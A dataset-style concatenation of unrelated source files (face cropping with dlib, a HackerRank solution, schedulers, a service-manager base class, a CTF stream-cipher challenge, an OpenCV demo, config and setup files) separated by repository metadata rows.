def add_leader_combo(DEFINITION, FUNCTION):
    # list.append returns None, so there is nothing meaningful to return here.
    list_of_leader_combos.append([DEFINITION, FUNCTION])
def add_chord_set(PSEUDOLAYER, INPUT_STRING, TYPE, data, output_buffer, index, number_of_strings, strings):
chord_set = {}
for set in data["chord_sets"]:
if set["name"] == TYPE:
chord_set = set["chords"]
break
separated_string = top_level_split(INPUT_STRING)
for word, chord in zip(separated_string, chord_set):
chord_hash = reduce((lambda x, y: str(x) + " + " + str(y)), ["H_" + key for key in chord])
[output_buffer, index, number_of_strings, strings] = add_key(PSEUDOLAYER, chord_hash, word, output_buffer, index, number_of_strings, strings)
return [output_buffer, index, number_of_strings, strings]
def add_dictionary(PSEUDOLAYER, keycodes, array, output_buffer, index, number_of_strings, strings):
for chord in array:
hash = ""
for word, key in zip(chord[:-1], keycodes):
if word == "X":
hash = hash + " + H_" + key
hash = hash[3:]
if hash != "":
[output_buffer, index, number_of_strings, strings] = add_key(PSEUDOLAYER, hash, chord[-1], output_buffer, index, number_of_strings, strings)
return [output_buffer, index, number_of_strings, strings]
def secret_chord(PSEUDOLAYER, ACTION, INPUT_STRING, data, output_buffer, index, number_of_strings, strings):
separated_string = top_level_split(INPUT_STRING)
hash = ""
for word, key in zip(separated_string, data["keys"]):
if word == "X":
hash = hash + " + H_" + key
hash = hash[3:]
if hash != "":
return add_key(PSEUDOLAYER, hash, ACTION, output_buffer, index, number_of_strings, strings)
| 49.083691 | 236 | 0.584707 |
3b96f39ea7dcb39fdda641725af35ecfec6ef0f3
| 5,724 |
py
|
Python
|
src/util.py
|
corganhejijun/FaceFill
|
6914f3ee680b41161817fe5eafc09b82e59d9113
|
[
"MIT"
] | null | null | null |
src/util.py
|
corganhejijun/FaceFill
|
6914f3ee680b41161817fe5eafc09b82e59d9113
|
[
"MIT"
] | null | null | null |
src/util.py
|
corganhejijun/FaceFill
|
6914f3ee680b41161817fe5eafc09b82e59d9113
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import cv2
import os
import dlib
from scipy import misc
import numpy as np
from PIL import Image
def getBound(img, shape):
xMin = len(img[0])
xMax = 0
yMin = len(img)
yMax = 0
for i in range(shape.num_parts):
if (shape.part(i).x < xMin):
xMin = shape.part(i).x
if (shape.part(i).x > xMax):
xMax = shape.part(i).x
if (shape.part(i).y < yMin):
yMin = shape.part(i).y
if (shape.part(i).y > yMax):
yMax = shape.part(i).y
return xMin, xMax, yMin, yMax
def combineImg(imga, imgb):
    # Paste the two images side by side. PIL's Image.new takes (width, height)
    # while numpy shapes are (rows, cols), so this is correct as written only
    # for the square images this pipeline produces.
    target = Image.new('RGB', (imga.shape[0]*2, imga.shape[1]))
    target.paste(Image.fromarray(np.uint8(imga)), (0, 0))
    target.paste(Image.fromarray(np.uint8(imgb)), (imgb.shape[0] + 1, 0))
    return target
def getFace(detector, shapePredict, img):
dets = detector(img, 1)
if (len(dets) == 0):
return None, None, None, None
det = dets[0]
shape = shapePredict(img, det)
xmin, xmax, ymin, ymax = getBound(img, shape)
if xmin < 0 or xmax < 0 or ymin < 0 or ymax < 0:
return None, None, None, None
return xmin, xmax, ymin, ymax
def headFromDir(inDir, outDir, shape_model, size, faceSize, outBleed_x=0, outBleed_y=0):
shapePredict = dlib.shape_predictor(shape_model)
detector = dlib.get_frontal_face_detector()
if not os.path.exists(outDir):
os.mkdir(outDir)
count = 0
fileList = os.listdir(inDir)
for name in fileList:
count += 1
print("processing %s, current %d of total %d" % (name, count, len(fileList)))
fileName = os.path.join(inDir, name)
if not fileName.endswith('.jpg'):
continue
img = cv2.cvtColor(cv2.imread(fileName), cv2.COLOR_BGR2RGB)
dets = detector(img, 1)
if (len(dets) == 0):
print("file %s has no face" % name)
continue
det = dets[0]
shape = shapePredict(img, det)
xmin, xmax, ymin, ymax = getBound(img, shape)
if xmin < 0 or xmax < 0 or ymin < 0 or ymax < 0:
print("file %s can't get bound" % name)
continue
left = xmin
right = xmax
top = ymin
bottom = ymax
longEdge = xmax - xmin
shortEdge = ymax - ymin
if longEdge < (ymax - ymin):
longEdge = ymax - ymin
shortEdge = xmax - xmin
            # To get a square crop area: starting from the face box, extend
            # one face-size upward, half a face-size downward, and 0.75 of a
            # face-size to the left and right.
top = int(ymin - longEdge)
bottom = int(ymax + longEdge / 2)
left = int(xmin - longEdge * 1.5 / 2)
right = int(xmax + longEdge * 1.5 / 2)
else:
left = int(xmin - shortEdge * 1.5 / 2)
right = int(xmax + shortEdge * 1.5 / 2)
top = int(ymin - shortEdge)
bottom = int(ymax + shortEdge / 2)
fullImg = np.zeros((size, size, 3))
marginLeft = 0
if left < 0:
marginLeft = -int(left * size / (right - left))
left = 0
marginTop = 0
if top < 0:
marginTop = -int(top * size / (bottom - top))
top = 0
marginRight = 0
if right > img.shape[1]:
marginRight = int((right - img.shape[1]) * size / (right - left))
right = img.shape[1]
marginBottom = 0
if bottom > img.shape[0]:
marginBottom = int((bottom - img.shape[0]) * size / (bottom - top))
bottom = img.shape[0]
cropedImg = img[top:bottom, left:right, :]
cropedImg = cv2.resize(cropedImg, dsize=(size - marginLeft - marginRight, size - marginTop - marginBottom))
fullImg[marginTop : size - marginBottom, marginLeft : size - marginRight, :] = cropedImg
if marginLeft > 0:
fullImg[marginTop:(size - marginBottom), 0:marginLeft, :] = np.tile(np.reshape(cropedImg[:,0,:], (size - marginTop - marginBottom, 1, 3)), (1, marginLeft, 1))
if marginRight > 0:
fullImg[marginTop:(size - marginBottom), (size - marginRight):size, :] = np.tile(np.reshape(cropedImg[:, cropedImg.shape[1] - 1, :], (size - marginTop - marginBottom, 1, 3)), (1, marginRight, 1))
if marginTop > 0:
fullImg[0:marginTop, :, :] = np.tile(np.reshape(fullImg[marginTop, :, :], (1, size, 3)), (marginTop, 1, 1))
if marginBottom > 0:
fullImg[(size - marginBottom):size, :, :] = np.tile(np.reshape(fullImg[(size - marginBottom), :, :], (1, size, 3)), (marginBottom, 1, 1))
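        # The four branches above replicate the crop's outermost row/column
        # into the out-of-frame margins, i.e. an edge-replication pad (the
        # same effect as cv2.copyMakeBorder with cv2.BORDER_REPLICATE).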
fullFace = np.zeros((size, size, 3))
xminFace, xmaxFace, yminFace, ymaxFace = getFace(detector, shapePredict, fullImg.astype(np.uint8))
        if xminFace is None:
print("file %s can't get face in fullImg" % name)
continue
if outBleed_x > 0:
xminFace -= outBleed_x
if xminFace < 0:
xminFace = 0
xmaxFace += outBleed_x
if xmaxFace > fullImg.shape[1]:
xmaxFace = fullImg.shape[1]
if outBleed_y > 0:
yminFace -= outBleed_y
if yminFace < 0:
yminFace = 0
fullFace[yminFace:ymaxFace, xminFace:xmaxFace, :] = fullImg[yminFace:ymaxFace, xminFace:xmaxFace, :]
combine = combineImg(fullImg, fullFace)
outPath = os.path.join(outDir, str(count).zfill(6) + '.jpg')
misc.imsave(outPath, combine)
| 40.309859 | 208 | 0.542453 |
8e9a420d670a164170f1b07674b8f564a6f898ca
| 755 |
py
|
Python
|
grading.py
|
nirobio/puzzles
|
fda8c84d8eefd93b40594636fb9b7f0fde02b014
|
[
"MIT"
] | null | null | null |
grading.py
|
nirobio/puzzles
|
fda8c84d8eefd93b40594636fb9b7f0fde02b014
|
[
"MIT"
] | null | null | null |
grading.py
|
nirobio/puzzles
|
fda8c84d8eefd93b40594636fb9b7f0fde02b014
|
[
"MIT"
] | null | null | null |
#!/bin/python3
import math
import os
import random
import re
import sys
# https://www.hackerrank.com/challenges/grading/problem
def gradingStudents(grades):
rounded_grades = []
for grade in grades:
if grade >= 38:
diff = 5 - grade % 5
if diff < 3:
grade += diff
rounded_grades.append(grade)
return rounded_grades
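# Worked examples (illustrative): gradingStudents([84, 29, 57]) -> [85, 29, 57]
# 84 -> 85 (gap to the next multiple of 5 is 1 < 3); 29 stays (below 38);
# 57 stays (gap is exactly 3, so no rounding).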
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
grades_count = int(input().strip())
grades = []
for _ in range(grades_count):
grades_item = int(input().strip())
grades.append(grades_item)
result = gradingStudents(grades)
fptr.write('\n'.join(map(str, result)))
fptr.write('\n')
fptr.close()
| 18.875 | 55 | 0.605298 |
796222768d619d9a12daf5d29c23805e7bb34365
| 965 |
py
|
Python
|
sches.py
|
dongdawang/ssrmgr
|
a9abedf8dc012bf6f421f95a1c215b5788f34322
|
[
"MIT"
] | null | null | null |
sches.py
|
dongdawang/ssrmgr
|
a9abedf8dc012bf6f421f95a1c215b5788f34322
|
[
"MIT"
] | 1 |
2021-06-01T22:59:31.000Z
|
2021-06-01T22:59:31.000Z
|
sches.py
|
dongjinhai/ssrmgr
|
a9abedf8dc012bf6f421f95a1c215b5788f34322
|
[
"MIT"
] | 1 |
2019-09-24T09:37:52.000Z
|
2019-09-24T09:37:52.000Z
|
import logging.handlers
from apscheduler.schedulers.blocking import BlockingScheduler
from mgr import UserMgr, HostMgr
handler = logging.handlers.RotatingFileHandler('log/ssrmgr.log', maxBytes=5*1024*1024, backupCount=5)
logging.basicConfig(
format='[%(asctime)s-%(filename)s-%(levelname)s:%(message)s]',
level=logging.DEBUG,
datefmt='%Y-%m-%d %I:%M:%S %p',
handlers=(handler,)
)
sched = BlockingScheduler()
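# Note on trigger defaults (per APScheduler's cron trigger, to the best of our
# reading): fields finer than the most specific one given default to their
# minimum, so minute="*" fires every minute and day="*" fires daily at 00:00.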
@sched.scheduled_job("cron", minute="*")
def sync_user():
"""同步用户"""
um = UserMgr()
um.update_user()
@sched.scheduled_job("cron", day="*")
def send_user_usage():
"""发送用户流量记录"""
um = UserMgr()
um.send_data_usage()
@sched.scheduled_job("cron", day="*")
def send_host_usage():
"""发送主机流量记录"""
hm = HostMgr()
hm.send_data_usage()
@sched.scheduled_job("cron", minute="*")
def report_status():
"""上报主机状态"""
hm = HostMgr()
hm.report_status()
if __name__ == '__main__':
sched.start()
| 20.104167 | 101 | 0.658031 |
5c27a5443fb18fb0190c979677d2b76b49817ec3
| 519 |
py
|
Python
|
7-assets/past-student-repos/LambdaSchool-master/m6/61b1/examples/guessing_game.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | 71 |
2019-03-05T04:44:48.000Z
|
2022-03-24T09:47:48.000Z
|
7-assets/past-student-repos/LambdaSchool-master/m6/61b1/examples/guessing_game.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | 8 |
2020-03-24T17:47:23.000Z
|
2022-03-12T00:33:21.000Z
|
cs/lambda_cs/01_intro_python/Intro-Python-II/examples/guessing_game.py
|
tobias-fyi/vela
|
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
|
[
"MIT"
] | 37 |
2019-03-07T05:08:03.000Z
|
2022-01-05T11:32:51.000Z
|
import random
def guessing_game():
print("Guess the number!")
secret_number = random.randrange(101)
while True:
guess = input("Input your guess: ")
try:
guess = int(guess)
except ValueError:
print("Please enter an integer.")
continue
print(f"You guessed: {guess}")
if guess == secret_number:
print("You win!")
break
elif guess < secret_number:
print("Too small!")
else:
print("Too big!")
if __name__ == '__main__':
guessing_game()
| 18.535714 | 39 | 0.60501 |
ebdb6d9e556cf90c72517ab9147b505e69274827
| 11,322 |
py
|
Python
|
workspace/cogrob/service_manager/model/base_service.py
|
CogRob/Rorg
|
dbf9d849e150404c117f6f0062476d995cec7316
|
[
"BSD-3-Clause"
] | 8 |
2019-05-07T02:30:58.000Z
|
2021-12-10T18:44:45.000Z
|
workspace/cogrob/service_manager/model/base_service.py
|
CogRob/Rorg
|
dbf9d849e150404c117f6f0062476d995cec7316
|
[
"BSD-3-Clause"
] | 1 |
2021-03-17T07:18:23.000Z
|
2021-03-17T07:18:23.000Z
|
workspace/cogrob/service_manager/model/base_service.py
|
CogRob/Rorg
|
dbf9d849e150404c117f6f0062476d995cec7316
|
[
"BSD-3-Clause"
] | 2 |
2019-05-21T14:15:24.000Z
|
2022-02-09T12:50:24.000Z
|
# Copyright (c) 2019, The Regents of the University of California
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the University of California nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OF THE UNIVERSITY OF CALIFORNIA
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from cogrob.service_manager.model import service_id
from cogrob.service_manager.model import service_request
from cogrob.service_manager.proto import service_state_pb2
from cogrob.service_manager.proto import service_options_pb2
from cogrob.service_manager.util import errors
ServiceId = service_id.ServiceId
ServiceOptions = service_options_pb2.ServiceOptions
ServiceStatePb = service_state_pb2.ServiceState
ServiceRequest = service_request.ServiceRequest
ServiceRequestId = service_request.ServiceRequestId
class BaseService(object):
"""
  BaseService is the common base of a service. It defines the interfaces.
Create:
    [RPC handler] calls CreateFromServiceOptionsPb through a router factory
                  function, which prepares the service (creates the docker
                  container, etc.) and registers it with the service manager.
Update:
By default, delete then create. Otherwise if supported, do a partial update.
Activate:
[RPC handler] Find the service and call ActRequestService.
ActRequestService will call HandleRequestService on other
                  services. Failures may happen, in which case an error
                  message will be returned.
"""
def __init__(self, manager):
# _manager is service_manager.ServiceManager
self._manager = manager
# _service_state is service_state_pb2.ServiceState
# _service_state should include all the current state. i.e. it
# alone is sufficient to construct self.
self._service_state = None
@staticmethod
def RestoreFromProto(service_state_pb, manager):
"""Restore from a service_state_pb2.ServiceState."""
    raise NotImplementedError(
        "RestoreFromProto in ServiceBase must be overridden by a derived class")
@staticmethod
def CreateFromServiceOptionsPb(service_options_pb, manager):
"""Create a service given options from the client."""
    raise NotImplementedError(
        "CreateFromServiceOptionsPb in ServiceBase must be overridden by a "
        "derived class")
def SetManager(self, manager):
self._manager = manager
def Update(self, new_options):
"""Update a service."""
    raise NotImplementedError(
        "Update in ServiceBase must be overridden by a derived class")
  def Remove(self):
    """Remove a service."""
    raise NotImplementedError(
        "Remove in ServiceBase must be overridden by a derived class")
def HandleRequestService(self, service_request):
"""Handle a request of this service (called by other services)."""
    raise NotImplementedError(
        "HandleRequestService in ServiceBase must be overridden by a derived "
        "class")
def HandleReleaseService(self, service_request_id):
"""Handle a request release of this service (called by other services)."""
    raise NotImplementedError(
        "HandleReleaseService in ServiceBase must be overridden by a derived "
        "class")
  def ActivateSelf(self):
    """Activate this service (called with no arguments, see below)."""
    raise NotImplementedError(
        "ActivateSelf in ServiceBase must be overridden by a derived class")
  def DeactivateSelf(self):
    """Deactivate this service (called with no arguments, see below)."""
    raise NotImplementedError(
        "DeactivateSelf in ServiceBase must be overridden by a derived class")
def ForceRestart(self):
"""Force restart the current service. """
# Some service is stateful: if roscore restarts, all other services will
# need to restart.
# TODO(shengye): Carefully design the usage of this interface.
    raise NotImplementedError(
        "ForceRestart in ServiceBase must be overridden by a derived class")
def ActRequestService(self, service_request):
"""Bringup some services on behalf of self."""
    raise NotImplementedError(
        "ActRequestService in ServiceBase must be overridden by a derived "
        "class")
def ActReleaseService(self, service_request_id):
"""Revert a previous service request on behalf of self."""
# TODO(shengye): add an immediate shutdown field.
    raise NotImplementedError(
        "ActReleaseService in ServiceBase must be overridden by a derived "
        "class")
def ToProto(self):
"""Convert self to service_state_pb2.ServiceState"""
result = service_state_pb2.ServiceState()
result.CopyFrom(self._service_state)
return result
def GetServiceId(self):
"""Get service id."""
return ServiceId.FromProto(self._service_state.id)
def GetStateProto(self):
"""For derived classes, get self._service_state"""
return self._service_state
def SetStateProto(self, pb):
"""For derived classes, set self._service_state"""
self._service_state = pb
def ActRequestServiceBasic(self, request):
# Returns List[DelayedAction]
if self.GetStateProto().status != ServiceStatePb.STATUS_ACTIVE:
raise errors.ServiceNotActiveError(
"Service {} is not active.".format(self.GetServiceId()))
filtered_requests_by_self = [
x for x in self.GetStateProto().requests_by_self if
ServiceRequestId.FromProto(x.request_id) != request.request_id]
self.GetStateProto().ClearField("requests_by_self")
self.GetStateProto().requests_by_self.extend(filtered_requests_by_self)
self.GetStateProto().requests_by_self.extend([request.ToProto()])
# The HandleRequestService will return a list of DelayedAction. They are
# non-blocking. The call handler will either wait for these actions to
# finish, or let the client know the situation.
all_delayed_actions = []
for requested_service in request.requested_services:
delayed_actions = (self._manager.GetService(requested_service)
.HandleRequestService(request))
all_delayed_actions.extend(delayed_actions)
return all_delayed_actions
def ActReleaseServiceBasic(self, service_request_id):
if (self.GetStateProto().status != ServiceStatePb.STATUS_ACTIVE and
self.GetStateProto().status != ServiceStatePb.STATUS_TO_BE_STOPPED):
raise errors.ServiceNotActiveError(
"Service {} is not active.".format(self.GetServiceId()))
filtered_requests_by_self = [
x for x in self.GetStateProto().requests_by_self
if ServiceRequestId.FromProto(x.request_id) != service_request_id]
if (len(filtered_requests_by_self)
== len(self.GetStateProto().requests_by_self)):
raise errors.ServiceRequestNotExistError(
"Cannot find service request: {}".format(str(service_request_id)))
service_request = ServiceRequest.FromProto(
[x for x in self.GetStateProto().requests_by_self
if ServiceRequestId.FromProto(x.request_id) == service_request_id][0])
self.GetStateProto().ClearField("requests_by_self")
self.GetStateProto().requests_by_self.extend(filtered_requests_by_self)
all_delayed_actions = []
for requested_service in service_request.requested_services:
delayed_actions = (self._manager.GetService(requested_service)
.HandleReleaseService(service_request.request_id))
all_delayed_actions.extend(delayed_actions)
return all_delayed_actions
def HandleRequestServiceBasic(self, request):
# TODO(shengye): We should check if self.GetServiceId() is in request.
# First, record the request, but not to duplicate the request.
filtered_service_req_id = [
x for x in self.GetStateProto().requested_by_others
if ServiceRequestId.FromProto(x) != request.request_id]
self.GetStateProto().ClearField("requested_by_others")
self.GetStateProto().requested_by_others.extend(filtered_service_req_id)
self.GetStateProto().requested_by_others.extend([
request.request_id.ToProto()])
return self.ActivateSelf()
def HandleReleaseServiceBasic(self, service_request_id):
# First, remove service_request_id from requested_by_others.
filtered_service_req_id = [
x for x in self.GetStateProto().requested_by_others
if ServiceRequestId.FromProto(x) != service_request_id]
if (len(filtered_service_req_id) >=
len(self.GetStateProto().requested_by_others)):
raise errors.ServiceRequestNotExistError(
"{} does not exist in {}.".format(service_request_id,
self.GetServiceId()))
self.GetStateProto().ClearField("requested_by_others")
self.GetStateProto().requested_by_others.extend(filtered_service_req_id)
if not self.GetStateProto().requested_by_others:
# We can now turn from active to inactive and cancel our request.
return self.DeactivateSelf()
else:
return []
def GetImpliedServiceRequest(self):
implied_service_ids = [
ServiceId.FromProto(x) for x
in self.GetStateProto().options.implied_dependencies]
return service_request.ServiceRequest(
service_request.ServiceRequestId(self.GetServiceId(), "__IMPLIED"),
implied_service_ids)
def IsInSimulation(self):
if (self.GetStateProto().options.run_mode
== service_options_pb2.RUN_MODE_SIMULATION):
return True
return False
def GetCpuUsage(self):
"""Get the CPU usage of this service (direct, e.g. CPU usage for
GroupService should not include this children processes, so that's
nearly zero). Returns None if not available."""
return None
def GetMemoryUsage(self):
"""Get the memory usage of this service (direct, e.g. memory usage for
GroupService should not include this children processes, so that's
nearly zero). Returns None if not available."""
return None
def IsActive(self):
return self.GetStateProto().status == ServiceStatePb.STATUS_ACTIVE
| 38.773973 | 80 | 0.736442 |
24216d136f442be9f8d43a741c01baea46c04b03
| 1,135 |
py
|
Python
|
VolgaCTF/2021/Quals/crypto/Carry/fcsr.py
|
mystickev/ctf-archives
|
89e99a5cd5fb6b2923cad3fe1948d3ff78649b4e
|
[
"MIT"
] | 1 |
2021-11-02T20:53:58.000Z
|
2021-11-02T20:53:58.000Z
|
VolgaCTF/2021/Quals/crypto/Carry/fcsr.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
VolgaCTF/2021/Quals/crypto/Carry/fcsr.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | 1 |
2021-12-19T11:06:24.000Z
|
2021-12-19T11:06:24.000Z
|
import random
import math
class FCSR():
def __init__(self, q: int, m: int, a: int):
self.m = m
self.q = q + 1
self.k = int(math.log(q, 2))
self.a = a
@staticmethod
def get_i(n: int, i: int) -> int:
# right to left
return (n & (0b1 << i)) >> i
def clock(self) -> int:
s = self.m
for i in range(1, self.k + 1):
s += self.get_i(self.q, i) * self.get_i(self.a, self.k - i)
a_k = s % 2
a_0 = self.a & 0b1
self.m = s // 2
self.a = (self.a >> 1) | (a_k << (self.k - 1))
return a_0
def encrypt(self, data: bytes) -> bytes:
encrypted = b''
for byte in data:
key_byte = 0
for _ in range(8):
bit = self.clock()
key_byte = (key_byte << 1) | bit
encrypted += int.to_bytes(key_byte ^ byte, 1, 'big')
return encrypted
if __name__ == '__main__':
q = 509
k = int(math.log(q + 1, 2))
random.seed()
a = random.randint(1, 2 ** k - 1)
test = FCSR(q, 0, a)
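    # Keystream symmetry sketch (assumption: encrypt() is a plain XOR stream
    # cipher, so an identically-seeded FCSR run over the ciphertext recovers
    # the plaintext):
    #   enc, dec = FCSR(q, 0, a), FCSR(q, 0, a)
    #   ct = enc.encrypt(b'attack at dawn')
    #   assert dec.encrypt(ct) == b'attack at dawn'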
| 25.222222 | 72 | 0.444934 |
300fdfa379dc1de2242b38c95aac58d2693a2b18
| 940 |
py
|
Python
|
research/cv/DnCNN/src/config.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/DnCNN/src/config.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/DnCNN/src/config.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""configuration of DnCNN"""
from easydict import EasyDict as ed
config = ed(
{
'model': 'DnCNN',
'batch_size': 128,
'basic_lr': 0.001,
'epoch': 95,
'sigma': 25,
'lr_gamma': 0.2,
"save_checkpoint": True
}
)
| 31.333333 | 78 | 0.625532 |
067fc8a8c1346fa31de4ae23fd5af3b8d4d4a8d7
| 1,328 |
py
|
Python
|
python/image_processing/mat_draw.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python/image_processing/mat_draw.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python/image_processing/mat_draw.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
import numpy as np
import cv2
from matplotlib import pyplot as plt
# Create a black image
img = np.zeros((512,512,3), np.uint8)
# Draw a diagonal blue line with thickness of 5 px
cv2.line(img,(0,0),(511,511),(255,0,0),5)
# args: image, start point, end point, color, thickness
# OpenCV uses the BGR channel order (blue, green, red)
cv2.rectangle(img,(0,0),(510,128),(0,255,0),3)
# top left corner and bottom right corner of the rectangle
cv2.circle(img,(447,63), 63, (0,0,255), -1)
# center coordinates and radius
cv2.ellipse(img,(256,256),(100,50),0,0,180,255,-1)
# center location, (major axis and minor axis lengths)
pts = np.array([[10,5],[20,30],[70,20],[50,10]], np.int32)
pts = pts.reshape((-1,1,2))
cv2.polylines(img,[pts],True,(0,255,255))
pts = np.array([[100,5],[200,30],[370,20],[350,10]], np.int32)
pts = pts.reshape((-1,1,2))
cv2.polylines(img,[pts],False,(0,255,255))
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(img,'OpenCV',(10,500), font, 4,(255,255,255),2,cv2.LINE_AA)
# text data, bottom left corner from where it starts, font type, font scale (size of the font) , regular things LINE_AA is recommended
#plt.imshow(img, cmap = 'gray', interpolation = 'bicubic')
while True:
cv2.imshow('image',img)
# for pressing Esc key -- break
if cv2.waitKey(20) & 0xFF == 27:
break
cv2.destroyAllWindows()
| 26.039216 | 134 | 0.678464 |
231cc7e138d5afbc17a32cbe4b5f68cad38defb4
| 1,284 |
py
|
Python
|
Packs/ContentManagement/Scripts/ListCreator/ListCreator.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/ContentManagement/Scripts/ListCreator/ListCreator.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/ContentManagement/Scripts/ListCreator/ListCreator.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
from CommonServerPython import *
SCRIPT_NAME = 'ListCreator'
def configure_list(list_name: str, list_data: str) -> bool:
"""Create system lists using the createList built-in method.
"""
demisto.debug(f'{SCRIPT_NAME} - Setting "{list_name}" list.')
res = demisto.executeCommand('createList', {'listName': list_name, 'listData': list_data})
if is_error(res):
error_message = f'{SCRIPT_NAME} - {get_error(res)}'
demisto.debug(error_message)
return False
return True
def main():
args = demisto.args()
list_name = args.get('list_name')
list_data = args.get('list_data')
try:
configuration_status = configure_list(list_name, list_data)
return_results(
CommandResults(
outputs_prefix='ConfigurationSetup.Lists',
outputs_key_field='listname',
outputs={
'listname': list_name,
'creationstatus': 'Success.' if configuration_status else 'Failure.',
},
)
)
except Exception as e:
return_error(f'{SCRIPT_NAME} - Error occurred while setting up machine.\n{e}')
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| 27.913043 | 94 | 0.617601 |
88d17143ab476e31e2301d0b8ab5493e57765e25
| 479 |
py
|
Python
|
Implementierung/ResearchEnvironment/AuthorizationManagement/migrations/0004_auto_20180125_1659.py
|
Sashks/PSE
|
ae2d8133a85563c33583f15b9ba76a3a2bf0c762
|
[
"MIT"
] | null | null | null |
Implementierung/ResearchEnvironment/AuthorizationManagement/migrations/0004_auto_20180125_1659.py
|
Sashks/PSE
|
ae2d8133a85563c33583f15b9ba76a3a2bf0c762
|
[
"MIT"
] | null | null | null |
Implementierung/ResearchEnvironment/AuthorizationManagement/migrations/0004_auto_20180125_1659.py
|
Sashks/PSE
|
ae2d8133a85563c33583f15b9ba76a3a2bf0c762
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.1 on 2018-01-25 15:59
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('AuthorizationManagement', '0003_auto_20180125_1450'),
]
operations = [
migrations.AlterField(
model_name='resource',
name='owners',
field=models.ManyToManyField(related_name='owner', to=settings.AUTH_USER_MODEL),
),
]
| 23.95 | 92 | 0.653445 |
cc41347698f9ea1989c6c599312341a3b818595e
| 1,397 |
py
|
Python
|
setup.py
|
skylerberg/Flask-AntiCsrf
|
4cf4e7c0085bcc4b2cf64821f64d2eac9fc2081a
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
skylerberg/Flask-AntiCsrf
|
4cf4e7c0085bcc4b2cf64821f64d2eac9fc2081a
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
skylerberg/Flask-AntiCsrf
|
4cf4e7c0085bcc4b2cf64821f64d2eac9fc2081a
|
[
"Apache-2.0"
] | null | null | null |
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='Flask-AntiCsrf',
py_modules=['flask_anticsrf'],
version='0.0.1',
